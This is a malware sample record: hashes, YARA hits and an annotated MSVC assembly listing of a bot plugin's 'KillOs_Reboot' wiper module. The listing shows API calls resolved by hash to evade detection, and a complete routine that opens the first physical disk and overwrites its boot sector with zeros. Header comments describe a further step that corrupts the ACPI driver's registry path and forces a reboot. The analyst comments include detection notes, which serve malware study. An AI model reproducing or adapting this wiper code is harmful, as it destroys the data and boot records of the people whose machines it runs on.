
Sample details: 7b676302196a60a472a2560078d3a217 --

Hashes
MD5: 7b676302196a60a472a2560078d3a217
SHA1: 6aeb2d3d958c8ff2f4fc0ccd9799b497e1a312a8
SHA256: 8ac733f7731fb22fcd849ebf34cb080af37ea0033f74d9cdd570395b6937612c
SSDEEP: 384:tF/DXCWl9/UQPCDSIxCpOrkiXBqQ+iKLedbEpHelDzCBwH2zuyM4+/scECfqAI0r:6opHuESNLynXX8LFc7FX2cO+DmPltF
Details
File Type: BSD
Yara Hits
CuckooSandbox/embedded_win_api | YRP/domain | YRP/contentis_base64 |
Source
http://103.68.190.250/Sources//Advance/BJWJ/Builds/BOT_PLUG/Objs/Release/KillOs_Reboot.cod
Strings
		; Listing generated by Microsoft (R) Optimizing Compiler Version 15.00.30729.01 
	TITLE	e:\Projects\progs\Petrosjan\BJWJ\Source\Misc\KillOs_Reboot.cpp
	; =====================================================================
	; MSVC 15.00 (Visual Studio 2008) assembly listing (.cod) of
	; KillOs_Reboot.cpp from the "BJWJ" bot plugin build (see TITLE above).
	; Target: 32-bit x86, flat model, MASM/Intel syntax.  Each instruction
	; line reads: offset, encoded bytes, mnemonic.  The bytes are the
	; ground truth; the mnemonics are the assembler's rendering of them.
	; Lines of the form "; NNN  : ..." are the original C++ source that the
	; compiler interleaves into the listing.
	; "e8 00 00 00 00" calls and "OFFSET ..." immediates carry zero
	; displacements because this is a pre-link object listing; the linker
	; fills them in.
	; Behaviour of the module (from the functions below): overwrite the
	; first sector of physical disk 0, corrupt the ACPI driver's ImagePath
	; in every control set, then force a reboot.  Every Win32 API is
	; resolved by hash through GetProcAddressEx2, so none of the API names
	; appear as strings — see the per-function notes.
	; =====================================================================
	.686P
	include listing.inc
	.model	flat
INCLUDELIB LIBCMT
INCLUDELIB OLDNAMES
PUBLIC	?Hibernation@TVideoRecDLL@@2HB			; TVideoRecDLL::Hibernation
PUBLIC	?RunCallback@TVideoRecDLL@@2HB			; TVideoRecDLL::RunCallback
;	COMDAT ?RunCallback@TVideoRecDLL@@2HB
; Two exported integer constants of the plugin; their meaning is not
; shown in this listing (presumably read by the plugin host).
CONST	SEGMENT
?RunCallback@TVideoRecDLL@@2HB DD 01000H		; TVideoRecDLL::RunCallback
CONST	ENDS
;	COMDAT ?Hibernation@TVideoRecDLL@@2HB
CONST	SEGMENT
?Hibernation@TVideoRecDLL@@2HB DD 01H			; TVideoRecDLL::Hibernation
CONST	ENDS
PUBLIC	??$pushargEx@$00$0IPIPBBE@$0BE@PBDKHHHHH@@YAPAXPBDKHHHHH@Z ; pushargEx<1,150532372,20,char const *,unsigned long,int,int,int,int,int>
EXTRN	?GetProcAddressEx2@@YAPAXPADKKH@Z:PROC		; GetProcAddressEx2
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\core\getapi.h
;	COMDAT ??$pushargEx@$00$0IPIPBBE@$0BE@PBDKHHHHH@@YAPAXPBDKHHHHH@Z
_TEXT	SEGMENT
; ---------------------------------------------------------------------
; pushargEx<1,150532372,20,char const*,unsigned long,int,int,int,int,int>
;   Seven-argument API-hashing thunk, __cdecl (the caller removes a1..a7;
;   the "YA" in the mangled name marks the convention).
;   Resolves the target on every call via GetProcAddressEx2(NULL, 1,
;   08f8f114H, 20) and forwards a1..a7 to it.  The callee is WINAPI
;   (stdcall) and pops its own arguments, which is why only ebp is
;   restored before `ret`.
;   KillOs1 below emits exactly these constants inline at its
;   pCreateFileA line, so 08f8f114H is the hash of "CreateFileA"; module
;   slot 1 is presumably the kernel32 slot — confirm against getapi.h.
;   No NULL check on the resolved pointer: a failed lookup calls address 0.
;   Defender note: hunt on the hash constants or on the resolver's
;   behaviour; the API name itself never appears in the binary.
; ---------------------------------------------------------------------
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
_a6$ = 28						; size = 4
_a7$ = 32						; size = 4
??$pushargEx@$00$0IPIPBBE@$0BE@PBDKHHHHH@@YAPAXPBDKHHHHH@Z PROC ; pushargEx<1,150532372,20,char const *,unsigned long,int,int,int,int,int>, COMDAT
; 147  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 148  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E, F, G);
; 149  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
; Arguments pushed right-to-left: CacheIndex, hash, h (module slot), NULL.
  00003	6a 14		 push	 20			; 00000014H
  00005	68 14 f1 f8 08	 push	 150532372		; 08f8f114H
  0000a	6a 01		 push	 1
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
; GetProcAddressEx2 is __cdecl: drop its four arguments here.
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 150  : 	return func(a1, a2, a3, a4, a5, a6, a7);
; Re-push the caller's seven arguments for the stdcall target (eax).
  00016	ff 75 20	 push	 DWORD PTR _a7$[ebp]
  00019	ff 75 1c	 push	 DWORD PTR _a6$[ebp]
  0001c	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  0001f	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  00022	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  00025	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00028	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  0002b	ff d0		 call	 eax
; 151  : }
  0002d	5d		 pop	 ebp
  0002e	c3		 ret	 0
??$pushargEx@$00$0IPIPBBE@$0BE@PBDKHHHHH@@YAPAXPBDKHHHHH@Z ENDP ; pushargEx<1,150532372,20,char const *,unsigned long,int,int,int,int,int>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z
_TEXT	SEGMENT
; ---------------------------------------------------------------------
; pushargEx<1,255840707,22,void*,char*,unsigned long,unsigned long*,int>
;   Five-argument API-hashing thunk, __cdecl; same shape as the
;   seven-argument one above.  Resolves GetProcAddressEx2(NULL, 1,
;   0f3fd1c3H, 22) and forwards a1..a5 to the stdcall result.
;   KillOs1 calls this instantiation at its pWriteFile line with
;   (hDest, p, size, &size, NULL), so 0f3fd1c3H is the hash of
;   "WriteFile" (slot 1 presumably kernel32).
;   No NULL check on the resolved pointer.
; ---------------------------------------------------------------------
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z PROC ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>, COMDAT
; 131  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 132  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E);
; 133  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00003	6a 16		 push	 22			; 00000016H
  00005	68 c3 d1 3f 0f	 push	 255840707		; 0f3fd1c3H
  0000a	6a 01		 push	 1
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
; __cdecl resolver: caller drops the four arguments.
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 134  : 	return func(a1, a2, a3, a4, a5);
  00016	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  00019	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  0001c	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  0001f	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00022	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  00025	ff d0		 call	 eax
; 135  : }
  00027	5d		 pop	 ebp
  00028	c3		 ret	 0
??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z ENDP ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z	; pushargEx<1,1916711125,17,void *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z
_TEXT	SEGMENT
; ---------------------------------------------------------------------
; pushargEx<1,1916711125,17,void*>
;   One-argument API-hashing thunk, __cdecl, frameless (no ebp frame).
;   Resolves GetProcAddressEx2(NULL, 1, 723eb0d5H, 17) and forwards a1.
;   KillOs1 calls it at its pCloseHandle line with hDest, so 723eb0d5H is
;   the hash of "CloseHandle" (slot 1 presumably kernel32).
;   After the `add esp, 16` the stack holds only the return address, so
;   _a1$[esp-4] = [esp+4] is the caller's a1.
; ---------------------------------------------------------------------
_a1$ = 8						; size = 4
??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z PROC	; pushargEx<1,1916711125,17,void *>, COMDAT
; 100  : 	typedef LPVOID (WINAPI *newfunc)(A);
; 101  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	6a 11		 push	 17			; 00000011H
  00002	68 d5 b0 3e 72	 push	 1916711125		; 723eb0d5H
  00007	6a 01		 push	 1
  00009	6a 00		 push	 0
  0000b	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00010	83 c4 10	 add	 esp, 16			; 00000010H
; 102  : 	return func(a1);
  00013	ff 74 24 04	 push	 DWORD PTR _a1$[esp-4]
  00017	ff d0		 call	 eax
; 103  : }
  00019	c3		 ret	 0
??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z ENDP	; pushargEx<1,1916711125,17,void *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$01$0KKNGHPPI@$0MO@PAUHKEY__@@PADHJPAPAU1@@@YAPAXPAUHKEY__@@PADHJPAPAU0@@Z ; pushargEx<2,2866184184,206,HKEY__ *,char *,int,long,HKEY__ * *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$01$0KKNGHPPI@$0MO@PAUHKEY__@@PADHJPAPAU1@@@YAPAXPAUHKEY__@@PADHJPAPAU0@@Z
_TEXT	SEGMENT
; ---------------------------------------------------------------------
; pushargEx<2,2866184184,206,HKEY__*,char*,int,long,HKEY__**>
;   Five-argument API-hashing thunk, __cdecl.  Resolves
;   GetProcAddressEx2(NULL, 2, 0aad67ff8H, 206) and forwards a1..a5.
;   KillOs2 calls this instantiation at its pRegOpenKeyExA line with
;   (HKEY_LOCAL_MACHINE, path, 0, KEY_ALL_ACCESS, &key), so 0aad67ff8H
;   (shown signed as -1428783112) is the hash of "RegOpenKeyExA"; module
;   slot 2 is presumably the advapi32 slot — confirm against getapi.h.
;   No NULL check on the resolved pointer.
; ---------------------------------------------------------------------
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
??$pushargEx@$01$0KKNGHPPI@$0MO@PAUHKEY__@@PADHJPAPAU1@@@YAPAXPAUHKEY__@@PADHJPAPAU0@@Z PROC ; pushargEx<2,2866184184,206,HKEY__ *,char *,int,long,HKEY__ * *>, COMDAT
; 131  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 132  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E);
; 133  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00003	68 ce 00 00 00	 push	 206			; 000000ceH
  00008	68 f8 7f d6 aa	 push	 -1428783112		; aad67ff8H
  0000d	6a 02		 push	 2
  0000f	6a 00		 push	 0
  00011	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00016	83 c4 10	 add	 esp, 16			; 00000010H
; 134  : 	return func(a1, a2, a3, a4, a5);
  00019	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  0001c	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  0001f	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  00022	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00025	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  00028	ff d0		 call	 eax
; 135  : }
  0002a	5d		 pop	 ebp
  0002b	c3		 ret	 0
??$pushargEx@$01$0KKNGHPPI@$0MO@PAUHKEY__@@PADHJPAPAU1@@@YAPAXPAUHKEY__@@PADHJPAPAU0@@Z ENDP ; pushargEx<2,2866184184,206,HKEY__ *,char *,int,long,HKEY__ * *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$01$0DOEAAPNG@$0NL@PAUHKEY__@@PBDHHPBEK@@YAPAXPAUHKEY__@@PBDHHPBEK@Z ; pushargEx<2,1044385750,219,HKEY__ *,char const *,int,int,unsigned char const *,unsigned long>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$01$0DOEAAPNG@$0NL@PAUHKEY__@@PBDHHPBEK@@YAPAXPAUHKEY__@@PBDHHPBEK@Z
_TEXT	SEGMENT
; ---------------------------------------------------------------------
; pushargEx<2,1044385750,219,HKEY__*,char const*,int,int,unsigned char const*,unsigned long>
;   Six-argument API-hashing thunk, __cdecl.  Resolves
;   GetProcAddressEx2(NULL, 2, 3e400fd6H, 219) and forwards a1..a6.
;   KillOs2 calls it at its pRegSetValueExA line with
;   (key, "ImagePath", 0, REG_SZ, data, cbData), so 3e400fd6H is the hash
;   of "RegSetValueExA" (slot 2 presumably advapi32).
;   No NULL check on the resolved pointer.
; ---------------------------------------------------------------------
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
_a6$ = 28						; size = 4
??$pushargEx@$01$0DOEAAPNG@$0NL@PAUHKEY__@@PBDHHPBEK@@YAPAXPAUHKEY__@@PBDHHPBEK@Z PROC ; pushargEx<2,1044385750,219,HKEY__ *,char const *,int,int,unsigned char const *,unsigned long>, COMDAT
; 139  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 140  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E, F);
; 141  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00003	68 db 00 00 00	 push	 219			; 000000dbH
  00008	68 d6 0f 40 3e	 push	 1044385750		; 3e400fd6H
  0000d	6a 02		 push	 2
  0000f	6a 00		 push	 0
  00011	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00016	83 c4 10	 add	 esp, 16			; 00000010H
; 142  : 	return func(a1, a2, a3, a4, a5, a6);
  00019	ff 75 1c	 push	 DWORD PTR _a6$[ebp]
  0001c	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  0001f	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  00022	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  00025	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00028	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  0002b	ff d0		 call	 eax
; 143  : }
  0002d	5d		 pop	 ebp
  0002e	c3		 ret	 0
??$pushargEx@$01$0DOEAAPNG@$0NL@PAUHKEY__@@PBDHHPBEK@@YAPAXPAUHKEY__@@PBDHHPBEK@Z ENDP ; pushargEx<2,1044385750,219,HKEY__ *,char const *,int,int,unsigned char const *,unsigned long>
_TEXT	ENDS
PUBLIC	??$pushargEx@$01$0NLDFFFDE@$0NI@PAUHKEY__@@@@YAPAXPAUHKEY__@@@Z ; pushargEx<2,3677705524,216,HKEY__ *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$01$0NLDFFFDE@$0NI@PAUHKEY__@@@@YAPAXPAUHKEY__@@@Z
_TEXT	SEGMENT
; ---------------------------------------------------------------------
; pushargEx<2,3677705524,216,HKEY__*>
;   One-argument API-hashing thunk, __cdecl, frameless.  Resolves
;   GetProcAddressEx2(NULL, 2, 0db355534H, 216) and forwards a1.
;   KillOs2 calls it at its pRegCloseKey line with key, so 0db355534H
;   (shown signed as -617261772) is the hash of "RegCloseKey"
;   (slot 2 presumably advapi32).
;   _a1$[esp-4] = [esp+4]: a1 sits just above the return address once the
;   resolver's arguments have been dropped.
; ---------------------------------------------------------------------
_a1$ = 8						; size = 4
??$pushargEx@$01$0NLDFFFDE@$0NI@PAUHKEY__@@@@YAPAXPAUHKEY__@@@Z PROC ; pushargEx<2,3677705524,216,HKEY__ *>, COMDAT
; 100  : 	typedef LPVOID (WINAPI *newfunc)(A);
; 101  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	68 d8 00 00 00	 push	 216			; 000000d8H
  00005	68 34 55 35 db	 push	 -617261772		; db355534H
  0000a	6a 02		 push	 2
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 102  : 	return func(a1);
  00016	ff 74 24 04	 push	 DWORD PTR _a1$[esp-4]
  0001a	ff d0		 call	 eax
; 103  : }
  0001c	c3		 ret	 0
??$pushargEx@$01$0NLDFFFDE@$0NI@PAUHKEY__@@@@YAPAXPAUHKEY__@@@Z ENDP ; pushargEx<2,3677705524,216,HKEY__ *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$04$0MCKGLBKO@$0BJO@JHHPAE@@YAPAXJHHPAE@Z ; pushargEx<5,3265704366,414,long,int,int,unsigned char *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$04$0MCKGLBKO@$0BJO@JHHPAE@@YAPAXJHHPAE@Z
_TEXT	SEGMENT
; ---------------------------------------------------------------------
; pushargEx<5,3265704366,414,long,int,int,unsigned char*>
;   Four-argument API-hashing thunk, __cdecl, frameless.  Resolves
;   GetProcAddressEx2(NULL, 5, 0c2a6b1aeH, 414) and forwards a1..a4.
;   Reboot below calls it at its pRtlAdjustPrivilege line with
;   (SE_SHUTDOWN_PRIVILEGE, TRUE, FALSE, &OldValue), so 0c2a6b1aeH
;   (shown signed as -1029262930) is the hash of "RtlAdjustPrivilege";
;   module slot 5 is presumably the ntdll slot — confirm against getapi.h.
;   Frameless argument access: each push moves esp down by 4, so the four
;   operands _a4$[esp-4], _a3$[esp], _a2$[esp+4], _a1$[esp+8] all encode
;   as [esp+10H] (bytes "ff 74 24 10") yet address a4, a3, a2, a1 in turn.
; ---------------------------------------------------------------------
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
??$pushargEx@$04$0MCKGLBKO@$0BJO@JHHPAE@@YAPAXJHHPAE@Z PROC ; pushargEx<5,3265704366,414,long,int,int,unsigned char *>, COMDAT
; 124  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D);
; 125  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	68 9e 01 00 00	 push	 414			; 0000019eH
  00005	68 ae b1 a6 c2	 push	 -1029262930		; c2a6b1aeH
  0000a	6a 05		 push	 5
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 126  : 	return func(a1,a2,a3,a4);
  00016	ff 74 24 10	 push	 DWORD PTR _a4$[esp-4]
  0001a	ff 74 24 10	 push	 DWORD PTR _a3$[esp]
  0001e	ff 74 24 10	 push	 DWORD PTR _a2$[esp+4]
  00022	ff 74 24 10	 push	 DWORD PTR _a1$[esp+8]
  00026	ff d0		 call	 eax
; 127  : }
  00028	c3		 ret	 0
??$pushargEx@$04$0MCKGLBKO@$0BJO@JHHPAE@@YAPAXJHHPAE@Z ENDP ; pushargEx<5,3265704366,414,long,int,int,unsigned char *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$02$0KNHAEDKE@$0BAK@HH@@YAPAXHH@Z	; pushargEx<3,2909815716,266,int,int>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$02$0KNHAEDKE@$0BAK@HH@@YAPAXHH@Z
_TEXT	SEGMENT
; ---------------------------------------------------------------------
; pushargEx<3,2909815716,266,int,int>
;   Two-argument API-hashing thunk, __cdecl, frameless.  Resolves
;   GetProcAddressEx2(NULL, 3, 0ad7043a4H, 266) and forwards a1, a2.
;   Reboot below calls it at its pExitWindowsEx line with
;   (EWX_REBOOT | EWX_FORCE, 0), so 0ad7043a4H (shown signed as
;   -1385151580) is the hash of "ExitWindowsEx"; module slot 3 is
;   presumably the user32 slot — confirm against getapi.h.
;   Both operands encode as [esp+8] ("ff 74 24 08") for the same reason
;   as in the four-argument thunk above: esp drops 4 between the pushes.
; ---------------------------------------------------------------------
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
??$pushargEx@$02$0KNHAEDKE@$0BAK@HH@@YAPAXHH@Z PROC	; pushargEx<3,2909815716,266,int,int>, COMDAT
; 108  : 	typedef LPVOID (WINAPI *newfunc)(A, B);
; 109  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	68 0a 01 00 00	 push	 266			; 0000010aH
  00005	68 a4 43 70 ad	 push	 -1385151580		; ad7043a4H
  0000a	6a 03		 push	 3
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 110  : 	return func(a1,a2);
  00016	ff 74 24 08	 push	 DWORD PTR _a2$[esp-4]
  0001a	ff 74 24 08	 push	 DWORD PTR _a1$[esp]
  0001e	ff d0		 call	 eax
; 111  : }
  00020	c3		 ret	 0
??$pushargEx@$02$0KNHAEDKE@$0BAK@HH@@YAPAXHH@Z ENDP	; pushargEx<3,2909815716,266,int,int>
_TEXT	ENDS
PUBLIC	??_C@_0BD@KGBPHNNA@?2?2?4?2PHYSICALDRIVE0?$AA@	; `string'
EXTRN	?m_memset@@YAXPBXEI@Z:PROC			; m_memset
;	COMDAT ??_C@_0BD@KGBPHNNA@?2?2?4?2PHYSICALDRIVE0?$AA@
CONST	SEGMENT
; Device path of the first physical disk, opened raw by KillOs1 below.
; This is the only clear-text indicator in the module: every API name is
; replaced by a hash, but this string must reach CreateFileA verbatim.
??_C@_0BD@KGBPHNNA@?2?2?4?2PHYSICALDRIVE0?$AA@ DB '\\.\PHYSICALDRIVE0', 00H ; `string'
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\misc\killos_reboot.cpp
CONST	ENDS
;	COMDAT ?KillOs1@@YA_NXZ
_TEXT	SEGMENT
; ---------------------------------------------------------------------
; bool KillOs1(void)                                   (__cdecl, COMDAT)
;   Destructive routine #1.  Opens the raw disk device \\.\PHYSICALDRIVE0
;   (CreateFileA with GENERIC_READ|GENERIC_WRITE = 0c0000000H,
;   FILE_SHARE_READ = 1, OPEN_EXISTING = 3, FILE_ATTRIBUTE_NORMAL = 80H),
;   zero-fills a 512-byte stack buffer and writes it once.  No
;   SetFilePointer call is visible, so the write goes to the handle's
;   initial position — sector 0 of disk 0, i.e. the MBR — whenever the
;   open succeeds.  The handle is closed afterwards.
;   Returns al = 1 if WriteFile returned non-zero, 0 if the open or the
;   write failed.
;   Register roles: ebx = hDest; edi = 0 (reused for every NULL / 0
;   argument); esi = 512 (sizeof p), later the WriteFile result.
;   Locals: p[512] at ebp-516, size at ebp-4.
;   Defender notes: a user-mode process opening PHYSICALDRIVE0 with write
;   access is a high-signal event worth alerting on; CreateFileA itself is
;   resolved by hash, so the device string is the indicator to key on.
; ---------------------------------------------------------------------
_p$ = -516						; size = 512
_size$ = -4						; size = 4
?KillOs1@@YA_NXZ PROC					; KillOs1, COMDAT
; 18   : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
  00003	81 ec 04 02 00
	00		 sub	 esp, 516		; 00000204H
; ebx and edi are callee-saved under the MS x86 ABI.
  00009	53		 push	 ebx
  0000a	57		 push	 edi
; 19   : 	// 
; 20   : 	HANDLE hDest;
; 21   : 	CHAR p[512];
; 22   : 	DWORD size;
; 23   : 	BOOL ret;
; 24   :  
; 25   : 	hDest = pCreateFileA("\\\\.\\PHYSICALDRIVE0",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
; The compiler inlined the pushargEx<1,150532372,20,...> thunk here:
; resolve CreateFileA by hash (slot 1, hash 08f8f114H, cache index 20).
  0000b	6a 14		 push	 20			; 00000014H
  0000d	68 14 f1 f8 08	 push	 150532372		; 08f8f114H
  00012	6a 01		 push	 1
  00014	33 ff		 xor	 edi, edi
  00016	57		 push	 edi
  00017	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  0001c	83 c4 10	 add	 esp, 16			; 00000010H
; CreateFileA arguments, right-to-left: hTemplateFile=NULL,
; FILE_ATTRIBUTE_NORMAL, OPEN_EXISTING, lpSecurityAttributes=NULL,
; FILE_SHARE_READ, GENERIC_READ|GENERIC_WRITE, device path.
  0001f	57		 push	 edi
  00020	68 80 00 00 00	 push	 128			; 00000080H
  00025	6a 03		 push	 3
  00027	57		 push	 edi
  00028	6a 01		 push	 1
  0002a	68 00 00 00 c0	 push	 -1073741824		; c0000000H
  0002f	68 00 00 00 00	 push	 OFFSET ??_C@_0BD@KGBPHNNA@?2?2?4?2PHYSICALDRIVE0?$AA@
  00034	ff d0		 call	 eax
  00036	8b d8		 mov	 ebx, eax
; 26   : 	if(hDest == INVALID_HANDLE_VALUE)
  00038	83 fb ff	 cmp	 ebx, -1
  0003b	75 04		 jne	 SHORT $LN1@KillOs1
; 27   : 	{
; 28   : 		return FALSE;
; Open failed: return 0 in al (bool return) via the common epilogue.
  0003d	32 c0		 xor	 al, al
  0003f	eb 3d		 jmp	 SHORT $LN2@KillOs1
$LN1@KillOs1:
  00041	56		 push	 esi
; 29   : 	};
; 30   :     
; 31   :       
; 32   :     m_memset(p, 0, sizeof(p));
; esi = 512 = sizeof(p) = one disk sector; kept for the WriteFile call.
  00042	be 00 02 00 00	 mov	 esi, 512		; 00000200H
  00047	56		 push	 esi
  00048	8d 85 fc fd ff
	ff		 lea	 eax, DWORD PTR _p$[ebp]
  0004e	57		 push	 edi
  0004f	50		 push	 eax
  00050	e8 00 00 00 00	 call	 ?m_memset@@YAXPBXEI@Z	; m_memset
; 33   : 	size = sizeof(p);
; 34   : 	ret = (BOOL) pWriteFile(hDest,p,size,&size,NULL);
; WriteFile(hDest, p, 512, &size, NULL) through the hashed thunk; the
; zeroed 512 bytes land at the current file position (no seek was done).
  00055	57		 push	 edi
  00056	8d 45 fc	 lea	 eax, DWORD PTR _size$[ebp]
  00059	50		 push	 eax
  0005a	56		 push	 esi
  0005b	8d 85 fc fd ff
	ff		 lea	 eax, DWORD PTR _p$[ebp]
  00061	50		 push	 eax
  00062	53		 push	 ebx
; size = 512 is stored only now; its address was already pushed above.
  00063	89 75 fc	 mov	 DWORD PTR _size$[ebp], esi
  00066	e8 00 00 00 00	 call	 ??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>
; 35   :         
; 36   :     pCloseHandle(hDest);
  0006b	53		 push	 ebx
; esi = WriteFile result, saved across the CloseHandle call.
  0006c	8b f0		 mov	 esi, eax
  0006e	e8 00 00 00 00	 call	 ??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z ; pushargEx<1,1916711125,17,void *>
; 36 = 12 (m_memset, __cdecl) + 20 (WriteFile thunk) + 4 (CloseHandle
; thunk): all three callees are __cdecl, so one combined clean-up.
  00073	83 c4 24	 add	 esp, 36			; 00000024H
; 37   : 	
; 38   : 	return ret != FALSE;
; al = (ret != 0); edi is still 0 here.
  00076	33 c0		 xor	 eax, eax
  00078	3b f7		 cmp	 esi, edi
  0007a	0f 95 c0	 setne	 al
  0007d	5e		 pop	 esi
$LN2@KillOs1:
  0007e	5f		 pop	 edi
  0007f	5b		 pop	 ebx
; 39   : }
; leave = mov esp, ebp / pop ebp
  00080	c9		 leave
  00081	c3		 ret	 0
?KillOs1@@YA_NXZ ENDP					; KillOs1
_TEXT	ENDS
PUBLIC	??_C@_09JMMKOPDJ@ImagePath?$AA@			; `string'
PUBLIC	??_C@_0P@GPJKKLCO@?2services?2ACPI?$AA@		; `string'
PUBLIC	??_C@_07HCDGMPEB@SYSTEM?2?$AA@			; `string'
PUBLIC	??_C@_0BK@PHPGFLJ@system32?2drivers?2A?QPI?4sys?$AA@ ; `string'
PUBLIC	??_C@_0BC@KEFDNJNC@CurrentControlSet?$AA@	; `string'
PUBLIC	??_C@_0O@DMMDAJLG@ControlSet002?$AA@		; `string'
PUBLIC	??_C@_0O@BHOOFKHF@ControlSet001?$AA@		; `string'
EXTRN	?m_lstrlen@@YGKPBD@Z:PROC			; m_lstrlen
EXTRN	?m_lstrcat@@YGXPADPBD@Z:PROC			; m_lstrcat
